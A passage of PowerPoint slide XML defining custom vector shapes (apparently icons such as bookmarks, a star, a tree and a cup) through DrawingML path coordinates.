                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18926" y="18900"/>
                  <a:pt x="19145" y="18598"/>
                  <a:pt x="19145" y="18225"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19145" y="18181"/>
                  <a:pt x="19135" y="18143"/>
                  <a:pt x="19130" y="18102"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19137" y="18100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17830" y="8513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21292" y="6699"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21296" y="6697"/>
                  <a:pt x="21301" y="6695"/>
                  <a:pt x="21306" y="6692"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21320" y="6684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21319" y="6680"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21484" y="6571"/>
                  <a:pt x="21600" y="6344"/>
                  <a:pt x="21600" y="607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6" name="Shape 2776"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10568435" y="5015787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00" y="7855"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9900" y="7855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9900" y="9818"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9900" y="10090"/>
                  <a:pt x="10303" y="10309"/>
                  <a:pt x="10800" y="10309"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11297" y="10309"/>
                  <a:pt x="11700" y="10090"/>
                  <a:pt x="11700" y="9818"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11700" y="7855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15300" y="7855"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15797" y="7855"/>
                  <a:pt x="16200" y="7635"/>
                  <a:pt x="16200" y="7364"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16200" y="7092"/>
                  <a:pt x="15797" y="6873"/>
                  <a:pt x="15300" y="6873"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11700" y="6873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11700" y="4909"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11700" y="4638"/>
                  <a:pt x="11297" y="4418"/>
                  <a:pt x="10800" y="4418"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10303" y="4418"/>
                  <a:pt x="9900" y="4638"/>
                  <a:pt x="9900" y="4909"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9900" y="6873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6300" y="6873"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5803" y="6873"/>
                  <a:pt x="5400" y="7092"/>
                  <a:pt x="5400" y="7364"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5400" y="7635"/>
                  <a:pt x="5803" y="7855"/>
                  <a:pt x="6300" y="7855"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="19800" y="19847"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11464" y="14886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11457" y="14889"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11294" y="14791"/>
                  <a:pt x="11063" y="14727"/>
                  <a:pt x="10800" y="14727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10537" y="14727"/>
                  <a:pt x="10306" y="14791"/>
                  <a:pt x="10142" y="14889"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10136" y="14886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1800" y="19847"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1800" y="982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19800" y="982"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19800" y="982"/>
                  <a:pt x="19800" y="19847"/>
                  <a:pt x="19800" y="19847"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20700" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="900" y="0"/>
                </a:ln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63" y="21600"/>
                  <a:pt x="1394" y="21536"/>
                  <a:pt x="1559" y="21438"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1564" y="21441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10800" y="15945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20036" y="21441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20041" y="21438"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20206" y="21536"/>
                  <a:pt x="20437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7" name="Shape 2777"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11076303" y="5015787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20095"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11298" y="14886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11293" y="14890"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11170" y="14791"/>
                  <a:pt x="10997" y="14727"/>
                  <a:pt x="10800" y="14727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10603" y="14727"/>
                  <a:pt x="10430" y="14791"/>
                  <a:pt x="10306" y="14890"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10302" y="14886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1350" y="20095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20095"/>
                  <a:pt x="20250" y="20095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72" y="21600"/>
                  <a:pt x="1045" y="21537"/>
                  <a:pt x="1169" y="21438"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1173" y="21441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10800" y="15839"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20427" y="21441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20431" y="21438"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20555" y="21537"/>
                  <a:pt x="2072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7337" y="7850"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9710" y="7850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10039" y="7213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10800" y="5738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11561" y="7213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11890" y="7850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14263" y="7850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13014" y="8550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12253" y="8976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12557" y="9638"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13240" y="11130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11598" y="10254"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10800" y="9828"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10002" y="10254"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8360" y="11130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9043" y="9638"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9347" y="8976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8586" y="8550"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8586" y="8550"/>
                  <a:pt x="7337" y="7850"/>
                  <a:pt x="7337" y="7850"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5737" y="13745"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10800" y="11045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15863" y="13745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13838" y="9328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18225" y="6868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12825" y="6868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10800" y="2945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8775" y="6868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3375" y="6868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7762" y="9328"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7762" y="9328"/>
                  <a:pt x="5737" y="13745"/>
                  <a:pt x="5737" y="137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8" name="Shape 2778"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6238863" y="55490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79" name="Shape 2779"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6810214" y="5549048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7" y="16691"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5303" y="12525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5294" y="12521"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5355" y="12447"/>
                  <a:pt x="5400" y="12365"/>
                  <a:pt x="5400" y="12273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5400" y="12001"/>
                  <a:pt x="5098" y="11782"/>
                  <a:pt x="4725" y="11782"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3375" y="11782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6615" y="8640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6606" y="8635"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6691" y="8553"/>
                  <a:pt x="6750" y="8456"/>
                  <a:pt x="6750" y="8345"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6750" y="8075"/>
                  <a:pt x="6448" y="7855"/>
                  <a:pt x="6075" y="7855"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4855" y="7855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8548" y="4785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8544" y="4782"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8683" y="4691"/>
                  <a:pt x="8775" y="4564"/>
                  <a:pt x="8775" y="4418"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8775" y="4147"/>
                  <a:pt x="8473" y="3927"/>
                  <a:pt x="8100" y="3927"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7029" y="3927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10800" y="1185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14571" y="3927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13500" y="3927"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13128" y="3927"/>
                  <a:pt x="12825" y="4147"/>
                  <a:pt x="12825" y="4418"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12825" y="4564"/>
                  <a:pt x="12917" y="4691"/>
                  <a:pt x="13056" y="4782"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="13052" y="4785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16744" y="7855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15525" y="7855"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15153" y="7855"/>
                  <a:pt x="14850" y="8075"/>
                  <a:pt x="14850" y="8345"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14850" y="8456"/>
                  <a:pt x="14909" y="8553"/>
                  <a:pt x="14994" y="8635"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="14985" y="8640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18225" y="11782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16875" y="11782"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16503" y="11782"/>
                  <a:pt x="16200" y="12001"/>
                  <a:pt x="16200" y="12273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16200" y="12365"/>
                  <a:pt x="16244" y="12447"/>
                  <a:pt x="16306" y="12521"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="16296" y="12525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19733" y="16691"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19733" y="16691"/>
                  <a:pt x="1867" y="16691"/>
                  <a:pt x="1867" y="16691"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12150" y="20618"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9450" y="20618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9450" y="17673"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12150" y="17673"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12150" y="17673"/>
                  <a:pt x="12150" y="20618"/>
                  <a:pt x="12150" y="20618"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="21494" y="16933"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21503" y="16929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18067" y="12764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19575" y="12764"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19948" y="12764"/>
                  <a:pt x="20250" y="12544"/>
                  <a:pt x="20250" y="12273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20250" y="12162"/>
                  <a:pt x="20191" y="12066"/>
                  <a:pt x="20106" y="11983"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20115" y="11978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16875" y="8836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18225" y="8836"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18598" y="8836"/>
                  <a:pt x="18900" y="8617"/>
                  <a:pt x="18900" y="8345"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18900" y="8200"/>
                  <a:pt x="18808" y="8072"/>
                  <a:pt x="18669" y="7982"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18673" y="7978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14980" y="4909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16200" y="4909"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16573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1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lnTo>
                  <a:pt x="6619" y="4909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2927" y="7978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2931" y="7982"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2792" y="8072"/>
                  <a:pt x="2700" y="8200"/>
                  <a:pt x="2700" y="8345"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2700" y="8617"/>
                  <a:pt x="3003" y="8836"/>
                  <a:pt x="3375" y="8836"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4725" y="8836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1485" y="11978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1494" y="11983"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1409" y="12066"/>
                  <a:pt x="1350" y="12162"/>
                  <a:pt x="1350" y="12273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1350" y="12544"/>
                  <a:pt x="1653" y="12764"/>
                  <a:pt x="2025" y="12764"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3533" y="12764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96" y="16929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106" y="16933"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="44" y="17007"/>
                  <a:pt x="0" y="17089"/>
                  <a:pt x="0" y="17182"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="17453"/>
                  <a:pt x="303" y="17673"/>
                  <a:pt x="675" y="17673"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8100" y="17673"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8100" y="21109"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8100" y="21380"/>
                  <a:pt x="8403" y="21600"/>
                  <a:pt x="8775" y="21600"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12825" y="21600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13198" y="21600"/>
                  <a:pt x="13500" y="21380"/>
                  <a:pt x="13500" y="21109"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="13500" y="17673"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20925" y="17673"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21298" y="17673"/>
                  <a:pt x="21600" y="17453"/>
                  <a:pt x="21600" y="17182"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="17089"/>
                  <a:pt x="21555" y="17007"/>
                  <a:pt x="21494" y="1693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0" name="Shape 2780"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7381565" y="5549048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14727"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2160" y="14727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2160" y="4909"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2160" y="2740"/>
                  <a:pt x="6028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4909"/>
                  <a:pt x="19440" y="14727"/>
                  <a:pt x="19440" y="14727"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="10800" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="4835" y="0"/>
                  <a:pt x="0" y="2198"/>
                  <a:pt x="0" y="4909"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="14727"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="15269"/>
                  <a:pt x="968" y="15709"/>
                  <a:pt x="2160" y="15709"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9720" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9720" y="21109"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9720" y="21380"/>
                  <a:pt x="10204" y="21600"/>
                  <a:pt x="10800" y="21600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11396" y="21600"/>
                  <a:pt x="11880" y="21380"/>
                  <a:pt x="11880" y="21109"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11880" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19440" y="15709"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20632" y="15709"/>
                  <a:pt x="21600" y="15269"/>
                  <a:pt x="21600" y="14727"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21600" y="4909"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="2198"/>
                  <a:pt x="16765" y="0"/>
                  <a:pt x="10800" y="0"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="7560" y="4909"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="6964" y="4909"/>
                  <a:pt x="6480" y="5129"/>
                  <a:pt x="6480" y="5400"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6480" y="12273"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6480" y="12544"/>
                  <a:pt x="6964" y="12764"/>
                  <a:pt x="7560" y="12764"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8156" y="12764"/>
                  <a:pt x="8640" y="12544"/>
                  <a:pt x="8640" y="12273"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8640" y="5400"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8640" y="5129"/>
                  <a:pt x="8156" y="4909"/>
                  <a:pt x="7560" y="4909"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="14040" y="4909"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="13444" y="4909"/>
                  <a:pt x="12960" y="5129"/>
                  <a:pt x="12960" y="5400"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12960" y="12273"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12960" y="12544"/>
                  <a:pt x="13444" y="12764"/>
                  <a:pt x="14040" y="12764"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14636" y="12764"/>
                  <a:pt x="15120" y="12544"/>
                  <a:pt x="15120" y="12273"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15120" y="5400"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15120" y="5129"/>
                  <a:pt x="14636" y="4909"/>
                  <a:pt x="1404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1" name="Shape 2781"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7838646" y="55490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6873"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="6162" y="6873"/>
                  <a:pt x="6382" y="6653"/>
                  <a:pt x="6382" y="6382"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6382" y="1473"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6382" y="1201"/>
                  <a:pt x="6162" y="982"/>
                  <a:pt x="5891" y="982"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5620" y="982"/>
                  <a:pt x="5400" y="1201"/>
                  <a:pt x="5400" y="1473"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5400" y="6382"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5400" y="6653"/>
                  <a:pt x="5620" y="6873"/>
                  <a:pt x="5891" y="6873"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="2945" y="5891"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3216" y="5891"/>
                  <a:pt x="3436" y="5671"/>
                  <a:pt x="3436" y="5400"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3436" y="2455"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3436" y="2183"/>
                  <a:pt x="3216" y="1964"/>
                  <a:pt x="2945" y="1964"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2675" y="1964"/>
                  <a:pt x="2455" y="2183"/>
                  <a:pt x="2455" y="2455"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2455" y="5400"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2455" y="5671"/>
                  <a:pt x="2675" y="5891"/>
                  <a:pt x="2945" y="5891"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="18655" y="15218"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17648" y="15218"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17660" y="15056"/>
                  <a:pt x="17673" y="14893"/>
                  <a:pt x="17673" y="14727"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17673" y="11291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18655" y="11291"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19739" y="11291"/>
                  <a:pt x="20618" y="12170"/>
                  <a:pt x="20618" y="13255"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20618" y="14339"/>
                  <a:pt x="19739" y="15218"/>
                  <a:pt x="18655" y="15218"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="16691" y="14727"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="16691" y="15802"/>
                  <a:pt x="16399" y="16805"/>
                  <a:pt x="15896" y="17673"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1777" y="17673"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1274" y="16805"/>
                  <a:pt x="982" y="15802"/>
                  <a:pt x="982" y="14727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4727"/>
                  <a:pt x="16691" y="14727"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="10800" y="20618"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6873" y="20618"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5131" y="20618"/>
                  <a:pt x="3569" y="19857"/>
                  <a:pt x="2491" y="18655"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15182" y="18655"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14103" y="19857"/>
                  <a:pt x="12542" y="20618"/>
                  <a:pt x="10800" y="20618"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="18655" y="10309"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17673" y="10309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17673" y="8836"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17673" y="8295"/>
                  <a:pt x="17233" y="7855"/>
                  <a:pt x="16691" y="7855"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="982" y="7855"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="440" y="7855"/>
                  <a:pt x="0" y="8295"/>
                  <a:pt x="0" y="8836"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="14727"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="17232"/>
                  <a:pt x="1344" y="19417"/>
                  <a:pt x="3346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0838"/>
                  <a:pt x="17453" y="20618"/>
                  <a:pt x="17182" y="20618"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="14330" y="20618"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15925" y="19659"/>
                  <a:pt x="17101" y="18074"/>
                  <a:pt x="17511" y="16200"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18655" y="16200"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20281" y="16200"/>
                  <a:pt x="21600" y="14882"/>
                  <a:pt x="21600" y="13255"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="11628"/>
                  <a:pt x="20281" y="10309"/>
                  <a:pt x="18655" y="10309"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="11782" y="5891"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="12053" y="5891"/>
                  <a:pt x="12273" y="5671"/>
                  <a:pt x="12273" y="5400"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12273" y="2455"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12273" y="2183"/>
                  <a:pt x="12053" y="1964"/>
                  <a:pt x="11782" y="1964"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11511" y="1964"/>
                  <a:pt x="11291" y="2183"/>
                  <a:pt x="11291" y="2455"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11291" y="5400"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11291" y="5671"/>
                  <a:pt x="11511" y="5891"/>
                  <a:pt x="11782" y="5891"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="14727" y="6873"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="14998" y="6873"/>
                  <a:pt x="15218" y="6653"/>
                  <a:pt x="15218" y="6382"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15218" y="1473"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15218" y="1201"/>
                  <a:pt x="14998" y="982"/>
                  <a:pt x="14727" y="982"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14456" y="982"/>
                  <a:pt x="14236" y="1201"/>
                  <a:pt x="14236" y="1473"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="14236" y="6382"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14236" y="6653"/>
                  <a:pt x="14456" y="6873"/>
                  <a:pt x="14727" y="6873"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="8836" y="5891"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="9107" y="5891"/>
                  <a:pt x="9327" y="5671"/>
                  <a:pt x="9327" y="5400"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9327" y="491"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9327" y="220"/>
                  <a:pt x="9107" y="0"/>
